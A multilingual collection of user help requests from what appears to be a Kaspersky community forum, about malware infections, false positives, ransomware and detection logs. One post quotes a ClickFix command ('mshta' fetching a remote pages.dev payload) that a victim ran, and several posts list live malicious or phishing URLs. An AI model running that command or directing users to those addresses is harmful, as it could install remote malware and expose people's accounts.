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  1. Hello, Our website https : //www.hanajede.cz/ has been incorrectly flagged as a phishing site. We do not engage in phishing or malware activities. We have already requested a re-evaluation via https://opentip.kaspersky.com/hanajede.cz, can you clarify that is the right way? Thank you.
  2. FShinzo

    Ticket não respondido

    Recentemente abri um ticket no kaspersky e ainda não me responderam, no chat online me disseram no máximo 24hrs, mas isso foi dia 6 e ainda continuo sem resposta, mesmo mandando email não me respondem, parece que esperam minha assinatura encerrar para que eu pague novamente, mas desse jeito não planejo assinar.
  3. several days ago i bought a new laptop, started using it before the configuration of kaspersky on the new device. i connected to my phone that might have been infected. now i wanted to complete the installation of the kaspersky on my new laptop. i got this communication. what am i supposed to do? when i click on ''learn more'' or ''support'' it sends me to a website where i cant find the solution to my problem is there any customer support email i can write to?
  4. For some time now, I've noticed that my computer was slower than normal, both when turning on and when performing tasks that I had previously performed without any problems. This week I received an email with a threat stating that my computer was being monitored and that everything I did, including my data, was in the hands of "hackers", so I immediately worried about formatting it to somehow inhibit this and also improve the performance of my computer. But it was still slow and that's not normal for him, I have a Ryzen 5 8600g, 16 GB of RAM, and an A620M Pro RS WiFi motherboard. I hired Kaspersk antivirus and activated it, and I noticed that every time I turn it on, it informs me that these two executables do not have a valid certificate and that they cannot confirm their reliability. Do I still have the virus installed on my machine, even after formatting it? What could I do? I tried to contact support as they provide support on the Plus plan but it is not available
  5. ZeroX

    Frage zu Packern

    Moin liebe Leser und Leserinnen, Und zwar habe ich die ein oder andere Frage und vielleicht sogar Anregung. 1. Erkennt Kaspersky Packer wie VMProtect, Themida und oder andere als Malware bzw. gibt es irgendeine andere Erkennung? 2. Erkennt Kaspersky nur Mehrfachpacking? So wie es mir aufgefallen ist, ist Punkt 1 nicht der Fall, was sehr schade ist, da Malware immer und immer und immer wieder in z.B. den 2 oben genannten sehr häufig versteckt wird. Ich finde diese Packer sollten erkannt werden bzw. sollte es eine Option geben welche man in ("Exclusions and actions on object detection" - in diesem Fall Englisches Interface weil ich keine Übersetzungen mag), aktivieren kann wie z.B. Multi-packed objects. So wie es aussieht ist dort ja eine Kategorie genau für diese Art welche Standartmäßig aktiviert ist und nicht deaktivierbar ist, Zitat "Packed objects whose packing may be used to protect malicious code", nur scheinbar sind dort nur sehr wenige Packer enthalten, mein Gefühl. Ebenfalls finde ich sollte Kaspersky einem die Möglichkeit geben einstellen zu können das Programme bzw. oftmals sogennante Tools, Zitat "Legitimate apps that intruders can use to damage your computer or personal data" automatisch entfernt werden wie z.B. eine reguläre Malware Erkennung. Dort könnte man ja auch einfach dann das Naming benutzen wie "not-a-virus:xxxxxxx". Ich finde es schlecht das man als User erst dann mit der Benachrichtigung interagieren muss, warum nicht die möglichkeit dies automatisch zu entfernen? Liebe Grüße, Danke im Voraus.
  6. Dear Kaspersky Support Team, I recently purchased a new domain, but it is being falsely flagged as dangerous and is blocked by Kaspersky Antivirus. This issue is preventing legitimate access to the site. Could you please investigate and assist in resolving this false positive? Thank you for your prompt attention to this matter.
  7. Hello, about 4-5 months ago my friend recommended me to get Kaspersky as he also used it, when I told him from where he downloaded it, he told me that there was a free Kaspersky version that I can probably find on YouTube, so I searched on YouTube something like "Free Kaspersky version", after opening one of the videos and watching it, I went to the description where I found the download link: https://www.kaspersky.com/downloads/free-antivirus, I opened it and checked if it was an official link or not, the domain should have been the official one, I even copy & pasted the last part (subdirectory or path) of the link and pasted it to the official Kaspersky domain to make sure it wasn't a fake link, then I tried to find this download page from the Kaspersky homepage to check if it was by the official Kaspersky or not, but I couldn't find it, I downloaded it anyway because my friend just said that it was safe and the official link, after that I opened the file and I setup Kaspersky fully, then I checked the expiration date, and it was going to end in a month, so after like 3 weeks of using Kaspersky, I checked the expiration date again and it became longer and it gave me 2 months extra, then after it almost expired again, the same thing happened, I didn't think much of it until I watched a YouTube video about some fake Kaspersky versions that were being spread around that were actually malware, this video was from a YouTuber I remember watching before knowing about Kaspersky, so I don't think it's a problem with the algorithm. Sorry if this was a dumb topic/post, I just find it confusing why I couldn't find that Kaspersky version from the main webpage and why the expiration date keeps getting longer and never ending, and I am scared if it was an unofficial version somehow. Here is the link again: https://www.kaspersky.com/downloads/free-antivirus
  8. Hello everyone. I ran a test pitting Kaspersky Antivirus Free against a Ransomware and a dangerous Script. If you want to check out the results, the video will be posted on my Yt channel: @vitaotek On the channel you will find several tests, including more tests with Kaspersky products as well. A Merry Christmas and a Happy New Year to all. Cheers.
  9. Buen dia comunidad, el jueves 19 a primeras horas de la madrugada mientras buscaba informacion sobre una escuela me tope con esta escuela aqui en Peru : https: //lavictoriagakko.edu.pe (tener cuidado con la web). Dentro de la pagina se mantiene la estructura de una pagina de escuela normal hasta que segundos despues aparece el captcha "no soy un robot" para hacer check en las figuras de autos. Luego de ello aparece un mensaje que que dice que algo asi como "para reiniciar la pagina" presion "Ctrl + r" , pega con "Ctrl + v" este codigo para recargar la pagina, el tema es que me sorprendio que algo ya este listo para pegar y quise ver por que se me habia copiado (en el portapapeles) un ejecutable solo por haber entrado a esa pagina, entonces fui al comando "Ctrl + r" presiono "Ctrl + v" (para visualizar que codigo malicioso era) y de casualidad lo termino ejecutando =( el codigo ejecutado en la ventana run de windows fue: mshta https: //microsoft-dns-reload-6y.pages.dev # "Microsoft Windows: DNS service Reload and Restart UP Tengan cuidado con ello. El problema es que en ese momento solo tenia instalado el windows defender (tengo windows 11 up to date). Algunas horas despues empezo el problema: entraron a mi cuenta de twitter e instagram (ambas con la configuracion de recordar credenciales cada vez que se iniciaba el chrome) , se detecto un inicio de sesion desde CA, USA en mi twitter y eliminaron mi instagram previamente habiendo cambiado el correo asociado a la cuenta por una de dominio @tenaent.com). La computadoraestuvo encendida un par de horas ese luego de la execucion de dicho executable malicioso en el cual use el scaner profundo de windows defender (que no hayo nada raro). Ese dia solo apague la computadora y al dia siguiente adquiri el karpersky premium, el cual arrojo troyanos HEUR:Trojan.Script.Generic (https: //bsc-dataseed1.binance.org https: //microsoft-dns-reload-6y.pages.dev), vinculo malicioso(https: //saaadnesss.shop/check) backdoors como "amenazas", asimismo de en algunos momentos aparecia "shell host is using camara web" pero Karspersky me daba la opcion de bloquear ello. De antemano muchas gracias a quien lea todo esto, cualquier ayuda es bienvenida porque lo que mas me preocupa es saber que informacion han robado en el tiempo que no era detectado.
  10. Hello Kaspersky Team and Community, I've been observing the Kaspersky Cyberthreat Live Map for a while now, and I'm a bit puzzled. While the map highlights significant activity globally, I've noticed that Canada often shows minimal threat data compared to many other countries, even during times when cybersecurity risks seem high worldwide. Given the heightened state of cyber activity, this discrepancy is causing me some concern. Could this be due to certain monitoring constraints specific to Canadian infrastructure, or perhaps an intentional choice in data visualization for regions? If this data gap is indicative of low activity, is there something about Canada's cybersecurity landscape that could explain this? Or, should I be worried that it might signal an oversight or lack of reporting that could impact our national security interests? Looking forward to your insights! Thank you. mato lechat
  11. Hello, Does anybody know what HEUR:Trojan.Multi.PBot.gen does? Google search leaves no results. Kasperky found it in system memory and removed it, but how to check are there any traces left? Os: Windows 10 home 22h2 (build 19045) Kaspersky total security 21.3 Note that I have python 3.13 installed (if pbot means pythonbot)
  12. Boa noite, me chamo gustavo e estou com um problema que está me estressando muito, a um tempo acabai sofrendo com um programa licenciado por um empresa que no fim, mesmo sendo pago era um malware que acabou vazando dados meus e me deixando bem impotente, dai por recomendação de um amigo assinei o plano da Kaspersky plus. realmente não tive mais problemas com isso, mas em contra partida pouco tempo depois percebi que o celular de minha mãe estava com o e-mail dela alterada e varias coisas da própria área de trabalho do celular dela alteradas. Depois de fazer algumas verificações averiguei que sim era um trojan e que ele tinha roubado bastante dados da minha mãe, além de ter trocado varias senhas e ter tentado entrar nas suas contas bancarias. Como não sou muito bom nesse tipo de problema, para evitar ser mais problemático coloquei um anti vírus no celular dela que encontrou o problema e me livrei dele. Contudo um dia depois meu colega de quarto também foi atacado, perdeu varias contas, discord, redes sociais, steam, recuperamos tudo, contudo não entendemos como isso tinha acontecido, resolvemos, mudamos a rede wi-fi, senha e etc, formatamos o roteador e o computador dele, mas hoje ele foi atacado novamente, ainda pior porque perdeu aceso a uma de suas contas bancarias, sua conta salario. Eu realmente não faço ideia o que posso fazer para acabar com esse problema, estou pensando em formatar simplesmente todos os eletrônicos da rede por medida desesperada, mas eu realmente não faço ideia como resolver e gostaria de alguma orientação. Por hora minha maquina está segura, mas não tenho mais nenhuma noite de sono ficando a espreita, olhando cada notificação, cada mudança com medo de perder algo novamente. Uma coisa que gostaria de acrescentar que as senhas que usamos são feitas pelo próprio edge reconhecidas como senhas fortes, não tem ligação nenhuma com nada nosso, não anotamos ela no dispositivo e a única forma dele de fato acessar é de alguma forma controlando nosso computador. Isso está acontecendo a mais o menos 6 dias. O computador dele eu considero que foi o mais vulnerável pq ele tem um costume de deixar ele sempre ligado, e ligado a rede, por isso imagino que o mesmo está ou estivesse na rede wi-fi. Olhamos alguns fórum e temos receio do hacker estar em nivel kernel de algum dispositivo, já que os anti virus não parecem funcionar para o detectar. No primeiro problema, quando meu colega de quarto foi hackeado, entramos no painel de controle e revogamos acesso a rede de praticamente todos os apps, deixando somente acesso ao sistema do win 11 e apps necessários, excluindo acesso a todos os outros para ter acesso a internet.
  13. Сегодня, 03.11.2024 1:20:31;Обнаружена ранее открытая вредоносная ссылка;Firefox;firefox.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Program Files\Mozilla Firefox;10976;Активный пользователь;Не обработано;Не обработано;https://_brovideos5s_site/code/mvrdimjsmy5ha3ddf43tmnjv;Возможна неправомерная загрузка ПО;Высокая;;https://_brovideos5s_site/code/mvrdimjsmy5ha3ddf43tmnjv;mvrdimjsmy5ha3ddf43tmnjv;https://brovideos5s.site/code;Веб-страница;Облачная защита. Произошёл переход по этой ссылке при открытии другой: https://_ vashotvet_com/task/3587893#:~:text=Если первый вал R%2C а,и отношение угловых скоростей 1%2F2. До первого лога было ещё один лог: Сегодня, 03.11.2024 1:10:57;Загрузка остановлена;Firefox;firefox.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Program Files\Mozilla Firefox;10976;Активный пользователь;Запрещено;Запрещено;https://brovideos5s.site/code/mvrdimjsmy5ha3ddf43tmnjv;Возможна неправомерная загрузка ПО;Высокая;;https://brovideos5s.site/code/mvrdimjsmy5ha3ddf43tmnjv;mvrdimjsmy5ha3ddf43tmnjv;https://brovideos5s.site/code;Веб-страница;Облачная защита. А ещё, пока я писал это сообщение, случайно ещё два раза перешёл по первой ссылке:). А я всего лишь хотел добавить пробел, чтобы она перестала быть кликабельной (со второй так делать не рискнул). Есть причины беспокоиться по поводу первого лога? Напрягает "Не обработано" в результате. Для контекста, провёл уже 4 проверки на вирусы без обнаружения, похоже, придётся сделать ещё парочку:)
  14. hello, i was installing kaspersky total security a week ago and then i got attacked by makop malware that decrypted all of my files i was trying to find decryptor tools for it but didn't find any, then i try contact kaspersky official account and they gave me some decryptor tools on their website but no tools for MKP decrypt are there anyone have same trouble? i'm really need my files back
  15. Eu baixei 3 arquivos .torrent hoje que continham 3 pastas da série que eu quero assistir, então eu terminei de baixar os torrents e extraí pra minha pasta de downloads e o Kaspersky não detectou nada. Quando eu decidi mover os arquivos pro meu Drive, o Kaspersky começou a detectar .ink maliciosos nas pastas, e está detectando sempre quando eu clico pra assistir o .mkv ou quando eu tento mover o .mkv pro Drive. Eu estou fazendo um scan completo do sistema e até agora não detectou nada, mas tenho receio de que possa ter algo malicioso rodando em segundo plano por eu ter clicado no .mkv infectado. Segue abaixo o log de detecção: Evento: Objeto excluído Usuário: LUCAS\ls Tipo de usuário: Iniciador Nome do aplicativo: explorer.exe Caminho do aplicativo: C:\WINDOWS Componente: Antivírus de Arquivos Resultado da descrição: Excluído(s) Tipo: Cavalo de Troia Nome: HEUR:Trojan.Multi.GenBadur.gena Precisão: Exatamente Nível de ameaça: Alto Tipo de objeto: Arquivo Nome do objeto: Vida de Escritório (The Office) 2007 - 3ª Temporada Completa Acesse o ORIGINAL WWW.BLUDV.TV.lnk Caminho do objeto.: C:\Users\ls\AppData\Roaming\Microsoft\Windows\Recent MD5 de um objeto: 86917E9A3A3BD6DDF2ADE07ECFB138EC
  16. Hace unos meses el gobierno me dio una netbook, pero esta le faltaba drivers asi que fui al encargado de computacion de mi escuela, el me dijo que tenia que instalarlos manualmente....yo por vago busque en internet un "actualizador de driver" y lo descargue Fui ingenuo, al iniciar la app me pide que para poder actualizarlos, necesito "pagar su subscripcion", cosa que obvio no hice La cosa es que entre los "beneficios" de esa subscripcion, esta el poder eliminar la aplicacion, lo cual me alerto aun mas Intente borrarla desde aplicaciones y no me deja el propio sistema, le borre algunos archivos de sus archivos de programa pero se ejecuta igual y sigue spameando notificaciones con "ofertas" El analisis rapido me dice que no pasa nada pero esta app es muy sospechosa, por medio de kaspersky le quite algunos permisos pero se inicia igual...el analisis completo me aparece que duraria 20 horas y la bateria apenas dura 3 horas continuas y aca en Argentina hace calor, se calienta mucho
  17. I tried to explain events via pictures and links. I especially took the screenshots full screen for date and time. Hope it helps. I bought Kaspersky Premium subscription and tested some malwares with it's Real Time Protection feature. I download some samples from known malware sample websites. KP (Kaspersky Premium) is detecting "some" of them while downloading to my computer (i guess because of their HASH'es). BUT i tested some samples which i encountered on the internet and tried to copy to my computer and KP did NOT detect this KNOWN (Virustotal 52/73) malware and other one is KNOWN (Virustotal 48/73) malware. I rescanned these malwares at 21:13 or 21:14 (UTC +3) and still NOT detecting. I am curious is Kaspersky updating their data through Virustotal or NOT? Because first file's first submission date 9 SPT and second file's first submission is 19 AUG. How Kaspersky CAN NOT detect these KNOWN malwares? Can someone (Kaspersky Malware Analysis Team) explain me this situtation? I don't feel safe while using Kaspersky Premium because it doesn't meet my BASIC requirements. If possible may i buy Kaspersky EDR/XDR for home use with low price or big discount? Any help would be appreciated! Thanks in advance. Kind Regards. https://www.virustotal.com/gui/file/020420f20ee32bda982599939e5d4bcffcabd57e22a911f5eeeabf29e4dede7a/detection https://www.virustotal.com/gui/file/d90564f22fc7b04020a55e592056b659edec8e70d9463c77d79bb82bd370fa57/detection
  18. My Kaspersky Premium seems to stuck on removing some malware from my PC. It found 80 issues and I clicked to fix them. I did it few hours ago and the program is still "working". It looks like it stuck. I already restarted the system and nothing changed. Also, the program shows constantly: "Removing these objects requires your decision". It did ask me to make some decisions, which were limited to ignoring some of the issues it found. I did so hoping that maybe I will be able to remove it later by myself.
  19. Buen día amigos, El día de hoy me causó curiosidad que estoy obteniendo muchas alertas del siguiente tipo relacionado con el navegador Brave, cabe esaltar que soy muy precabido con el tema de descargar archivos maliciosos, adicionalmente no he descargado dado nada sospechoso: File 1: C:\Users\malea\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Service Worker\CacheStorage\ba00623a413aef1be0c65618db85f0b8176e803d\7891746b-4a74-41ef-a59e-90c64f0af3bd\046097c811953f25_0//046097c811953f25_0//./arsenal-kit/kits/udrl-vs/udrl.py File 2: C:\Users\malea\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Service Worker\CacheStorage\ba00623a413aef1be0c65618db85f0b8176e803d\7891746b-4a74-41ef-a59e-90c64f0af3bd\046097c811953f25_0//046097c811953f25_0//./arsenal-kit/kits/resource/template.py Espero puedan ayudarme a identificar que esta pasando y de que se tratan esos archivos.. Gracias, Cordialmente M.L. Adicionalmente,
  20. Hello support team, I want to run the following files on my system but VirusTotal detects threat, however Kaspersky is not showing any threat detection(I am using premium Kasepersky, home edition) I just want to know if these files are safe, let me know if You can confirm this. here are the 4 VirusTotal link files: https://www.virustotal.com/gui/file/f5e6682c44cb73f65d2f349fc651d7c3c78b2e49fa56a765a702a877c8c563d3/detection https://www.virustotal.com/gui/file/ce66ca7f2ede112a03356850594762591dbe62ac083eb989c9e8e58b6138e316/detection https://www.virustotal.com/gui/file/e968563a93f2fcb5690ee2f77ab097c8c757da5bb156dead731048dfa64f008b https://www.virustotal.com/gui/file/0175940ccb7a1cc71c27ea13ee574d7f7d73e58e1d9c48f22ffebc157d9a0b24/detection Also let me know if i can somehow send files to you, everyfile is .exe format Thank You in advance, Best Regards
  21. Gabriel Aguiar

    Diretório desconhecido e arquivo estranho

    Após realizar uma varredura no meu notebook com o Kaspersky Virus Removal Tool, ele me retornou o seguinte arquivo: Rootkit.Boot.Backboot.e Que está localizado no diretório: \Device\Harddisk1\DR1 Assim como é mostrado no print em anexo: Minha dúvida é, o que é esse arquivo? Quais acessos ele teria no meu computador? E como faço para acessar esse diretório em que ele está localizado? Ps: O arquivo, antes mesmo de estar na quarentena já estava nesse diretório, conforme segundo print em anexo: Ps2: Os outros "virus" eu já consegui remover. O que está me preocupando é esse do rootkit. Ps3: Eu pesquisei na internet e pelo que eu vi esse rootkit só infecta sistemas Linux. É isso mesmo?
  22. 98410koauka

    KRD Not Detecting

    KRD didn't like me attempting to run a version from 2016 understandably, so downloaded what appears to be v18 yesterday (3.16.24) and created a bootable CD. Loaded without error and told me to update. Setup wireless. Clicked "try again" and off to the "races." Or so I thought. Visually and operationally this HP Pavilion g6-1d60us notebook is very sick. See pic below. However, it came back with a clean "bill of health" from KRD... and I set it to check all partitions on the drive. HP is running Windows 7 Home Prem 64bit (ver 6.1 (Build 7601: Service Pack 1). As the pic shows, nearly everything comes up as a .PDF... and tries to open as a .PDF. This doesn't work too well! Has anyone seen this previously. Any thoughts. Attempted to ask Google, but it didn't understand the question. Oh yes, I'm told this unit rarely, if ever was connected to the Internet as it was used primarily to run Ridgid SeaSnake sewer cameras. Also, the Google Chrome was installed just a couple of day ago via download to thumb drive using another system. It did function... until shut down. Only way to start was to reinstall... which again, good 'till it was closed. Thanks in advance. Any questions I will try to address as best I can.
  23. لقد اصاب الجهاز الكمبيوتر فايروس الفدية قبل استخدام المكافح الفيروس كاسبر من نوع norvas هل يوجد حل
  24. was doing some research for work, which involved visiting different companies websites. I was using Google Chrome when I was doing my research and when I was viewing this website I received 11 notifications in a row saying Malicious Object Detected from chrome.exe, unluckily all of them were allowed by Kaspersky. I performed a quick scan, restarted my computer, and did a full scan and all came out cleaned. . Since the results of all my scans are clean I was wondering if I have to be worried about anything. I'm not sure how to send reports, but I've attached screenshots of my Kaspersky reports:
  25. Ich habe jetzt schon 2 mal ein phishing SMS von Banken zu gesendet bekommen, bei denen ich nicht einmal Kunde bin... (habe natürlich die Bank kontaktiert und ihnen geschrieben, dass betrügerische SMS die Runde machen) ABER ich habe auch auf Opentip Kaspersky die websites eingegeben um einen Betrug zu melden aber beide Websiten sind nicht als "phishing" gemeldet, meine Frage wie kann ich eine Meldung einreichen? Die Websites um die es sich handelt sind: "raff-kunde . online" "bawag-ai . com" Ich hoffe ich bin richtig bei dem Forum?
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